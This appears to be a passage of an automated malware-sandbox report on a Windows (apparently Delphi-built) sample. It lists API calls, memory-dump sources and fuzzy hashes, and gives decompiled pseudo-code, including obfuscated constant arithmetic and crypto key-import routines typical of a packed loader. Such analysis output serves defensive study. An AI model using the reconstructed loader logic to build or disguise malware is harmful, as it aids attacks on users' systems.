                                                0x0040991d
                                                0x00409922
                                                0x00409926
                                                0x00409929
                                                0x0040992c
                                                0x0040993c
                                                0x00409949

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 004098CC
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 0040991D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileLibraryLoadModuleName
                                                • String ID:
                                                • API String ID: 1159719554-0
                                                • Opcode ID: fee7203526c99c492627a90671c6ea93e27203af42f0eb7a7628b6b2e4e0d64d
                                                • Instruction ID: abcb281defec52438f0aee72fd6b8df3303e77283fcf52908e18b12cff9e9f28
                                                • Opcode Fuzzy Hash: fee7203526c99c492627a90671c6ea93e27203af42f0eb7a7628b6b2e4e0d64d
                                                • Instruction Fuzzy Hash: 8F119170A4421CABDB15EB60CD86BDE73B8EB04304F5144BFB908B32D1DA785F84CA99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,00770223,?,?), ref: 00770E02
                                                • SetErrorMode.KERNELBASE(00000000,?,?,00770223,?,?), ref: 00770E07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: 2d4e3394b66ef8ae9ce10699264cf18145feedeed87f970c8040e06d6a4eda9a
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 7ED0123224522CB7DB002B94DC09BCEBB1C9F05BA6F008461FB0DE9181CBB49A4047EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL ref: 004094CF
                                                  • Part of subcall function 0040918C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004093B1,?,?), ref: 004091C5
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 0040920E
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 00409230
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040924E
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040926C
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040928A
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 004092A8
                                                  • Part of subcall function 0040918C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1), ref: 004092E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Open$AllocateFileHeapModuleNameQueryValue
                                                • String ID:
                                                • API String ID: 1498552066-0
                                                • Opcode ID: 5ac7ca9ec81bc7bfe72ff0239882a76ae01f185a44a38f61c9deb5fcbadb4562
                                                • Instruction ID: 8d95190941045e390cd65a6c7fba753f498773491901b0d068e0e883a774856c
                                                • Opcode Fuzzy Hash: 5ac7ca9ec81bc7bfe72ff0239882a76ae01f185a44a38f61c9deb5fcbadb4562
                                                • Instruction Fuzzy Hash: 0FF02730704604BFD701DF56CC42B1973E9D789700FA20476F800A3692D67CAD10D59C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040861C(void* __eax) {
                                                				short _v532;
                                                				void* __ebx;
                                                				void* __esi;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				void* _t18;
                                                				void* _t19;
                                                				intOrPtr _t20;
                                                				void* _t21;
                                                
                                                				_t16 = __eax;
                                                				_t22 =  *((intOrPtr*)(__eax + 0x10));
                                                				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
                                                					_t14 = E00409890(_t21, _t16, _t18, _t19, _t22); // executed
                                                					_t20 = _t14;
                                                					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
                                                					if(_t20 == 0) {
                                                						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                					}
                                                				}
                                                				return  *((intOrPtr*)(_t16 + 0x10));
                                                			}












                                                0x00408624
                                                0x00408626
                                                0x0040862a
                                                0x0040863a
                                                0x00408643
                                                0x00408648
                                                0x0040864a
                                                0x0040864f
                                                0x00408654
                                                0x00408654
                                                0x0040864f
                                                0x00408662

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040863A
                                                  • Part of subcall function 00409890: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 004098CC
                                                  • Part of subcall function 00409890: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 0040991D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileModuleName$LibraryLoad
                                                • String ID:
                                                • API String ID: 4113206344-0
                                                • Opcode ID: f05193af6b9ae2eb17e4c641f12adcc748934bd50d5f8c8f5afbbe42bfbbf2f0
                                                • Instruction ID: 0e81d8804b11a62c962dc62eaeeb1fe2862d9b45ef9dac6b836595d74b3b49b3
                                                • Opcode Fuzzy Hash: f05193af6b9ae2eb17e4c641f12adcc748934bd50d5f8c8f5afbbe42bfbbf2f0
                                                • Instruction Fuzzy Hash: C9E06D71A003109BCB10EF58C9C5A4333D4AB08714F04496AAD68DF387D376CD1087D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00770929
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ProcessTerminate
                                                • String ID:
                                                • API String ID: 560597551-0
                                                • Opcode ID: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
                                                • Instruction ID: 30f3d7182eefe4c983e93399632d1765ae8032794c4adb82b9e2ac84a56656d9
                                                • Opcode Fuzzy Hash: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
                                                • Instruction Fuzzy Hash: EE90026074415011D82025AC0C02B0500121751634F344B107130AD1E4D840D6400115
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402C90(signed int __eax) {
                                                				void* _t4;
                                                				intOrPtr _t7;
                                                				signed int _t8;
                                                				void** _t10;
                                                				void* _t12;
                                                				void* _t14;
                                                
                                                				_t8 = __eax;
                                                				E00402C24(__eax);
                                                				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
                                                				if(_t4 == 0) {
                                                					 *0x500aec = 0;
                                                					return 0;
                                                				} else {
                                                					_t10 =  *0x500ad8; // 0x500ad4
                                                					_t14 = _t4;
                                                					 *_t14 = 0x500ad4;
                                                					 *0x500ad8 = _t4;
                                                					 *(_t14 + 4) = _t10;
                                                					 *_t10 = _t4;
                                                					_t12 = _t14 + 0x13fff0;
                                                					 *((intOrPtr*)(_t12 - 4)) = 2;
                                                					 *0x500aec = 0x13ffe0 - _t8;
                                                					_t7 = _t12 - _t8;
                                                					 *0x500ae8 = _t7;
                                                					 *(_t7 - 4) = _t8 | 0x00000002;
                                                					return _t7;
                                                				}
                                                			}









                                                0x00402c92
                                                0x00402c94
                                                0x00402ca7
                                                0x00402cae
                                                0x00402d00
                                                0x00402d09
                                                0x00402cb0
                                                0x00402cb0
                                                0x00402cb6
                                                0x00402cb8
                                                0x00402cbe
                                                0x00402cc3
                                                0x00402cc6
                                                0x00402cca
                                                0x00402cd5
                                                0x00402ce2
                                                0x00402cea
                                                0x00402cec
                                                0x00402cf9
                                                0x00402cfd
                                                0x00402cfd

                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,004032A7,?,0040384C), ref: 00402CA7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 326c3bdebeb7e627de19b7ce6dc7f538a477a2572a34d424dc00b6526fa549a6
                                                • Instruction ID: efd5973e88ca5547850cd3ab6255c5b1b359cf299ad81ce79c05260f9c7ae9f1
                                                • Opcode Fuzzy Hash: 326c3bdebeb7e627de19b7ce6dc7f538a477a2572a34d424dc00b6526fa549a6
                                                • Instruction Fuzzy Hash: D8F0AFF2B043404FE754DF789E4434ABAE4E708314F10413EE909EB7D4DAB488059B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00402DBA(void* __eax) {
                                                				struct _MEMORY_BASIC_INFORMATION _v44;
                                                				void* _v48;
                                                				void* _t13;
                                                				int _t20;
                                                				void* _t22;
                                                				signed int _t26;
                                                				signed int _t29;
                                                				signed int _t30;
                                                				void* _t34;
                                                				intOrPtr _t35;
                                                				signed int _t39;
                                                				void* _t41;
                                                				void* _t42;
                                                
                                                				_push(_t29);
                                                				_t42 = _t41 + 0xffffffdc;
                                                				_t34 = __eax - 0x10;
                                                				E00402D0C();
                                                				_t13 = _t34;
                                                				 *_t42 =  *_t13;
                                                				_v48 =  *((intOrPtr*)(_t13 + 4));
                                                				_t26 =  *(_t13 + 0xc);
                                                				if((_t26 & 0x00000008) != 0) {
                                                					_t22 = _t34;
                                                					_t39 = _t26 & 0xfffffff0;
                                                					_t30 = 0;
                                                					while(1) {
                                                						VirtualQuery(_t22,  &_v44, 0x1c);
                                                						if(VirtualFree(_t22, 0, 0x8000) == 0) {
                                                							break;
                                                						}
                                                						_t35 = _v44.RegionSize;
                                                						if(_t39 > _t35) {
                                                							_t39 = _t39 - _t35;
                                                							_t22 = _t22 + _t35;
                                                							continue;
                                                						}
                                                						goto L10;
                                                					}
                                                					_t30 = _t30 | 0xffffffff;
                                                				} else {
                                                					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
                                                					if(_t20 == 0) {
                                                						_t30 = _t29 | 0xffffffff;
                                                					} else {
                                                						_t30 = 0;
                                                					}
                                                				}
                                                				L10:
                                                				if(_t30 == 0) {
                                                					 *_v48 =  *_t42;
                                                					 *( *_t42 + 4) = _v48;
                                                				}
                                                				 *0x502b74 = 0;
                                                				return _t30;
                                                			}
















                                                0x00402dbe
                                                0x00402dc0
                                                0x00402dc5
                                                0x00402dc8
                                                0x00402dcd
                                                0x00402dd1
                                                0x00402dd7
                                                0x00402ddb
                                                0x00402de1
                                                0x00402dfd
                                                0x00402e01
                                                0x00402e04
                                                0x00402e06
                                                0x00402e0e
                                                0x00402e22
                                                0x00000000
                                                0x00000000
                                                0x00402e29
                                                0x00402e2f
                                                0x00402e31
                                                0x00402e33
                                                0x00000000
                                                0x00402e33
                                                0x00000000
                                                0x00402e2f
                                                0x00402e24
                                                0x00402de3
                                                0x00402deb
                                                0x00402df2
                                                0x00402df8
                                                0x00402df4
                                                0x00402df4
                                                0x00402df4
                                                0x00402df2
                                                0x00402e37
                                                0x00402e39
                                                0x00402e42
                                                0x00402e4b
                                                0x00402e4b
                                                0x00402e4e
                                                0x00402e5e

                                                APIs
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402DEB
                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402E0E
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402E1B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Virtual$Free$Query
                                                • String ID:
                                                • API String ID: 778034434-0
                                                • Opcode ID: aab089f6324b908b00522f95e514dda92ea28812edbdd12cb1dfe4c55132e884
                                                • Instruction ID: 08f1e0c87a1cd087832e8d35915ef13b2870af4c3a8107d53628f023ff2ab1f1
                                                • Opcode Fuzzy Hash: aab089f6324b908b00522f95e514dda92ea28812edbdd12cb1dfe4c55132e884
                                                • Instruction Fuzzy Hash: 18F06D703046005FD310CB1ACA88B17B7E5EFC4750F15C26AE888973E0D675DC01979A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00000000,004F30C8,?,?,00000000,004F31F8), ref: 00861413
                                                • CryptImportKey.ADVAPI32(?,?,00000254,00000000,00000000,?,?), ref: 00861537
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,004F2EFA,?,004FEEF0), ref: 0086161E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Crypt$AcquireContext$Import
                                                • String ID: ,O$/$8O$CNB_0309.DLL$CNB_0317.DLL$DO$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll$O$O
                                                • API String ID: 3710563934-1982265789
                                                • Opcode ID: 8b067af7de0b62cbe19893d3b42479b5e4d4d03e27a7ca6e6956962743a6d056
                                                • Instruction ID: 7249071db8ffc44119c3af7a3b345f2344f752005b5b6fa959f9acc27f73e28e
                                                • Opcode Fuzzy Hash: 8b067af7de0b62cbe19893d3b42479b5e4d4d03e27a7ca6e6956962743a6d056
                                                • Instruction Fuzzy Hash: 3823F270E00259DFCB10CFAAE985AADBBF1FB08306F15847AE405E7265D734A951CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,004F65DC,?,00000000,004F6673), ref: 00865F58
                                                • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000000,004F6587,?,?,00000000,004F6673), ref: 0086600F
                                                • CryptHashData.ADVAPI32(?,?,00000000,00000000,00000000,004F632A,?,?,?,?,00000000,004F6673), ref: 008660E0
                                                • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,004FEEA0,004FEF10,?,?,?,?,00000000,004F6673), ref: 0086618C
                                                • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00866298
                                                • CryptDestroyHash.ADVAPI32(?,004F6334,?,?,00000000,004F6673), ref: 008664C9
                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,004F6591,?,?,00000000,004F6673), ref: 008667D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                • String ID: ,O$,O$5$8O$GetUserDefaultLocaleName$Microsoft.WSMan.Management.dll$S$`\O$iaspolcy.dll
                                                • API String ID: 3606780921-3631910282
                                                • Opcode ID: 17b053318821211c53b50479e03f64d35be63d2f6872d3e56b2018bc56de05ea
                                                • Instruction ID: 3be6e4c4a6067e6cacaac2760bffa16900d8ed1625eeec2008f7d63050559ab4
                                                • Opcode Fuzzy Hash: 17b053318821211c53b50479e03f64d35be63d2f6872d3e56b2018bc56de05ea
                                                • Instruction Fuzzy Hash: B242C6B1A10249EFDB00CF6AED85AA977F5FB08302B15453AE504E7375D775A820CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00408F9C(short* __eax, intOrPtr __edx) {
                                                				short* _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				void* _v20;
                                                				struct _WIN32_FIND_DATAW _v612;
                                                				short _v1134;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				void* _t55;
                                                				signed int _t88;
                                                				signed int _t89;
                                                				intOrPtr* _t90;
                                                				signed int _t101;
                                                				signed int _t102;
                                                				short* _t112;
                                                				struct HINSTANCE__* _t113;
                                                				short* _t115;
                                                				short* _t116;
                                                				void* _t117;
                                                
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				_v16 = _v8;
                                                				_t113 = GetModuleHandleW(L"kernel32.dll");
                                                				if(_t113 == 0) {
                                                					L4:
                                                					if( *_v8 != 0x5c) {
                                                						_t115 = _v8 + 4;
                                                						goto L10;
                                                					} else {
                                                						if( *((short*)(_v8 + 2)) == 0x5c) {
                                                							_t116 = E00408F78(_v8 + 4);
                                                							if( *_t116 != 0) {
                                                								_t14 = _t116 + 2; // 0x2
                                                								_t115 = E00408F78(_t14);
                                                								if( *_t115 != 0) {
                                                									L10:
                                                									_t88 = _t115 - _v8;
                                                									_t89 = _t88 >> 1;
                                                									if(_t88 < 0) {
                                                										asm("adc ebx, 0x0");
                                                									}
                                                									_t43 = _t89 + 1;
                                                									if(_t89 + 1 <= 0x105) {
                                                										E004089C0( &_v1134, _v8, _t43);
                                                										while( *_t115 != 0) {
                                                											_t112 = E00408F78(_t115 + 2);
                                                											_t50 = _t112 - _t115;
                                                											_t51 = _t50 >> 1;
                                                											if(_t50 < 0) {
                                                												asm("adc eax, 0x0");
                                                											}
                                                											if(_t51 + _t89 + 1 <= 0x105) {
                                                												_t55 =  &_v1134 + _t89 + _t89;
                                                												_t101 = _t112 - _t115;
                                                												_t102 = _t101 >> 1;
                                                												if(_t101 < 0) {
                                                													asm("adc edx, 0x0");
                                                												}
                                                												E004089C0(_t55, _t115, _t102 + 1);
                                                												_v20 = FindFirstFileW( &_v1134,  &_v612);
                                                												if(_v20 != 0xffffffff) {
                                                													FindClose(_v20);
                                                													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
                                                														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
                                                														E004089C0( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
                                                														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
                                                														_t115 = _t112;
                                                														continue;
                                                													}
                                                												}
                                                											}
                                                											goto L24;
                                                										}
                                                										E004089C0(_v8,  &_v1134, _v12);
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
                                                					if(_t90 == 0) {
                                                						goto L4;
                                                					} else {
                                                						_push(0x105);
                                                						_push( &_v1134);
                                                						_push(_v8);
                                                						if( *_t90() == 0) {
                                                							goto L4;
                                                						} else {
                                                							E004089C0(_v8,  &_v1134, _v12);
                                                						}
                                                					}
                                                				}
                                                				L24:
                                                				return _v16;
                                                			}






















                                                0x00408fa8
                                                0x00408fab
                                                0x00408fb1
                                                0x00408fbe
                                                0x00408fc2
                                                0x00409001
                                                0x00409008
                                                0x00409048
                                                0x00000000
                                                0x0040900a
                                                0x00409012
                                                0x00409023
                                                0x00409029
                                                0x0040902f
                                                0x00409037
                                                0x0040903d
                                                0x0040904b
                                                0x0040904d
                                                0x00409050
                                                0x00409052
                                                0x00409054
                                                0x00409054
                                                0x00409057
                                                0x0040905f
                                                0x00409070
                                                0x00409137
                                                0x00409082
                                                0x00409086
                                                0x00409088
                                                0x0040908a
                                                0x0040908c
                                                0x0040908c
                                                0x00409097
                                                0x004090a7
                                                0x004090ab
                                                0x004090ad
                                                0x004090af
                                                0x004090b1
                                                0x004090b1
                                                0x004090b7
                                                0x004090cf
                                                0x004090d6
                                                0x004090dc
                                                0x004090f8
                                                0x004090fa
                                                0x00409121
                                                0x00409133
                                                0x00409135
                                                0x00000000
                                                0x00409135
                                                0x004090f8
                                                0x004090d6
                                                0x00000000
                                                0x00409097
                                                0x0040914d
                                                0x0040914d
                                                0x0040905f
                                                0x0040903d
                                                0x00409029
                                                0x00409012
                                                0x00408fc4
                                                0x00408fcf
                                                0x00408fd3
                                                0x00000000
                                                0x00408fd5
                                                0x00408fd5
                                                0x00408fe0
                                                0x00408fe4
                                                0x00408fe9
                                                0x00000000
                                                0x00408feb
                                                0x00408ff7
                                                0x00408ff7
                                                0x00408fe9
                                                0x00408fd3
                                                0x00409152
                                                0x0040915b

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408FB9
                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 00408FCA
                                                • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 004090CA
                                                • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 004090DC
                                                • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 004090E8
                                                • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0040912D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: GetLongPathNameW$\$kernel32.dll
                                                • API String ID: 1930782624-3908791685
                                                • Opcode ID: 7bfd6da0a51bea9cbff87e86f6837e20dd1a2e1208d5721c0ebb964e9cceb7fe
                                                • Instruction ID: b457252b37f825ca2f5f8d963c3cacb7670c93aa888cd6ef951b963f75adfa86
                                                • Opcode Fuzzy Hash: 7bfd6da0a51bea9cbff87e86f6837e20dd1a2e1208d5721c0ebb964e9cceb7fe
                                                • Instruction Fuzzy Hash: FB41C271E00619DBDB10EAA4CC89ADEB3B6AF44310F1485BAD544F73C2EB7C9E418B49
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(0040915C,?,?,?), ref: 00779209
                                                • GetProcAddress.KERNEL32(00000000,00409178), ref: 0077921A
                                                • FindFirstFileW.KERNEL32(?,?,0040915C,?,?,?), ref: 0077931A
                                                • FindClose.KERNEL32(?,?,?,0040915C,?,?,?), ref: 0077932C
                                                • lstrlenW.KERNEL32(?,?,?,?,0040915C,?,?,?), ref: 00779338
                                                • lstrlenW.KERNEL32(?,?,?,?,?,0040915C,?,?,?), ref: 0077937D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: \
                                                • API String ID: 1930782624-2967466578
                                                • Opcode ID: c376dbb1f1865d31d1b3797754f80c05f43d3c077cb8f76016cbcc13f6ede75f
                                                • Instruction ID: c0c2a52712e1315d3238d70fc38b41c91db35ab278a4169dd16a04c40648d607
                                                • Opcode Fuzzy Hash: c376dbb1f1865d31d1b3797754f80c05f43d3c077cb8f76016cbcc13f6ede75f
                                                • Instruction Fuzzy Hash: F941B131E01619DBDF10EBA4CC89ADDB3B5EF44350F14C5A4E648E7282EB78EE418B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E004F6334(void* __ebx, void* __eflags) {
                                                				signed int _t30;
                                                				signed int _t35;
                                                				signed int _t38;
                                                				signed int _t39;
                                                				signed int _t42;
                                                				intOrPtr _t43;
                                                				intOrPtr _t45;
                                                				intOrPtr _t47;
                                                				signed int _t48;
                                                				signed int _t49;
                                                				signed int _t51;
                                                				signed int _t52;
                                                				intOrPtr _t53;
                                                				intOrPtr _t54;
                                                				signed int _t70;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int _t79;
                                                				signed int _t80;
                                                				signed int _t84;
                                                				signed int _t92;
                                                				signed int _t94;
                                                				intOrPtr _t96;
                                                				signed int _t98;
                                                				void* _t99;
                                                				signed int _t101;
                                                				intOrPtr _t109;
                                                				intOrPtr _t111;
                                                				signed int _t116;
                                                				void* _t118;
                                                				void* _t121;
                                                				void* _t126;
                                                
                                                				_t99 = __ebx;
                                                				_t30 =  *0x4feef4; // 0xb52124ca
                                                				E004FEF0C = _t30 + 0x6a;
                                                				E00407678( *((intOrPtr*)(_t118 - 0x1c)), 4, 1, _t118 - 0x14);
                                                				_t35 =  *0x4feef0 * 0xce;
                                                				 *0x4fef28 = _t35;
                                                				E00407640( *((intOrPtr*)(_t118 - 0x18)),  *((intOrPtr*)(_t118 - 0x1c)));
                                                				if(_t35 != 0) {
                                                					_t38 =  *0x4fef14 * 0xf8;
                                                					__eflags = _t38;
                                                					E004FEF10 = _t38;
                                                				} else {
                                                					_t94 =  *0x4fef3c; // 0x1cb932a9
                                                					_t116 =  *0x4feea0; // 0xa1d900
                                                					_t121 = _t94 +  *0x4fef04 - _t116 +  *0x4fef3c;
                                                					if(_t121 >= 0) {
                                                						_t96 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feee0 = _t96 + 0xfb;
                                                					} else {
                                                						_t98 =  *0x4feeec; // 0xb52124f2
                                                						 *0x4feea0 = _t98;
                                                					}
                                                				}
                                                				_t39 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4fef28 = _t39;
                                                				E00406CF4(_t118 - 0x18,  *((intOrPtr*)(_t118 - 0x18)));
                                                				_t42 =  *0x4fef28; // 0x3c79b5d4
                                                				 *0x4feecc = _t42;
                                                				_t43 =  *0x4feea8; // 0x0
                                                				_t109 =  *0x4feec4; // 0x0
                                                				E00407640(_t43, _t109);
                                                				if(_t121 == 0) {
                                                					E004F0EBC(_t118 - 0x20,  &E004FEF38, _t121);
                                                					 *0x4feeec =  *0x4fef04 * 0x8a;
                                                					_t92 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4feef4 = _t92;
                                                					asm("fild dword [0x4fef18]");
                                                					 *0x4fef04 = E004048CC();
                                                				}
                                                				_t45 =  *0x4fef18; // 0xbc3e19a
                                                				E004FEF20 = _t45 +  *0x4fef40;
                                                				_t47 =  *0x4feeb8; // 0x0
                                                				 *((intOrPtr*)(_t118 - 0x3c)) = _t47;
                                                				if( *((intOrPtr*)(_t118 - 0x3c)) != 0) {
                                                					 *((intOrPtr*)(_t118 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x3c)) - 4));
                                                				}
                                                				if( *((intOrPtr*)(_t118 - 0x3c)) != 0x53) {
                                                					_t48 = E004FEF0C; // 0xb52124bf
                                                					_t49 = _t48 + 4;
                                                					__eflags = _t49;
                                                					 *(_t118 - 0x44) = _t49;
                                                					asm("fild dword [ebp-0x44]");
                                                					 *0x4feefc = E004048D8();
                                                				} else {
                                                					_t79 =  *0x4fef30; // 0xa1d816
                                                					E004FEF38 = _t79;
                                                					_t80 = E004FEF38; // 0xc3c34fdc
                                                					_t126 = _t80 -  *0x4feef4; // 0xb52124ca
                                                					if(_t126 >= 0) {
                                                						E00407678( *((intOrPtr*)(_t118 - 0xc)), 0, 1, _t118 - 0xc);
